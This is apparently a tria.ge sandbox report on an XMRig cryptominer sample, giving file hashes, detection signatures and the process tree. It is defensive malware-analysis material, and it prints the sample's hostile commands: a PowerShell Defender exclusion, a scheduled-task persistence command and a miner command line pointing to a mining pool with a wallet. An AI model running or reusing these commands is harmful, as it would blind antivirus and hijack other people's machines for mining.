Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
42s -
max time network
146s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
27/12/2022, 15:13
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20220812-en
10 signatures
150 seconds
General
-
Target
file.exe
-
Size
2.7MB
-
MD5
4f62eb4f1a2c1fc46df059120e6e6cef
-
SHA1
bd2fcde45f562ec5b0c741fa102c3dfa0234d511
-
SHA256
6ee27f5f4be9f1cfeb98b5190367ca60d1c81b527b730d808b4b29e30b44931d
-
SHA512
38c9d721302f345a8c1efcf6d40a735e181b67d2fe8e19bf5a20e6347de325f1c974f553ad640553f1fe3546729600a8d485964a36fbb6d76d7c58244ac72dd3
-
SSDEEP
49152:IvEl6mjUImipdKvT6QD66iMVptYC0qs7QVlWSwI9SrxCsU:IamScvPfOCHs8yCs
Malware Config
Signatures
-
XMRig Miner payload 13 IoCs
resource yara_rule behavioral1/memory/1616-104-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/1616-106-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/1616-108-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/1616-109-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/1616-111-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/1616-113-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/1616-114-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/1616-116-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/1616-118-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/1616-119-0x0000000140343234-mapping.dmp xmrig behavioral1/memory/1616-121-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/1616-123-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/1616-124-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig -
Uses the VBS compiler for execution 1 TTPs
-
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1960 set thread context of 1616 1960 file.exe 34 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1668 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1512 powershell.exe 1960 file.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 1960 file.exe Token: SeDebugPrivilege 1512 powershell.exe Token: SeLockMemoryPrivilege 1616 vbc.exe Token: SeLockMemoryPrivilege 1616 vbc.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 1616 vbc.exe -
Suspicious use of WriteProcessMemory 24 IoCs
description pid Process procid_target PID 1960 wrote to memory of 1512 1960 file.exe 28 PID 1960 wrote to memory of 1512 1960 file.exe 28 PID 1960 wrote to memory of 1512 1960 file.exe 28 PID 1960 wrote to memory of 676 1960 file.exe 30 PID 1960 wrote to memory of 676 1960 file.exe 30 PID 1960 wrote to memory of 676 1960 file.exe 30 PID 676 wrote to memory of 1668 676 cmd.exe 32 PID 676 wrote to memory of 1668 676 cmd.exe 32 PID 676 wrote to memory of 1668 676 cmd.exe 32 PID 1960 wrote to memory of 1616 1960 file.exe 34 PID 1960 wrote to memory of 1616 1960 file.exe 34 PID 1960 wrote to memory of 1616 1960 file.exe 34 PID 1960 wrote to memory of 1616 1960 file.exe 34 PID 1960 wrote to memory of 1616 1960 file.exe 34 PID 1960 wrote to memory of 1616 1960 file.exe 34 PID 1960 wrote to memory of 1616 1960 file.exe 34 PID 1960 wrote to memory of 1616 1960 file.exe 34 PID 1960 wrote to memory of 1616 1960 file.exe 34 PID 1960 wrote to memory of 1616 1960 file.exe 34 PID 1960 wrote to memory of 1616 1960 file.exe 34 PID 1960 wrote to memory of 1616 1960 file.exe 34 PID 1960 wrote to memory of 1616 1960 file.exe 34 PID 1960 wrote to memory of 1616 1960 file.exe 34 PID 1960 wrote to memory of 1616 1960 file.exe 34
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1960 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1512
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "HMHM" /tr "C:\ProgramData\edge\HMHM.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:676 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "HMHM" /tr "C:\ProgramData\edge\HMHM.exe"3⤵
- Creates scheduled task(s)
PID:1668
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1616
-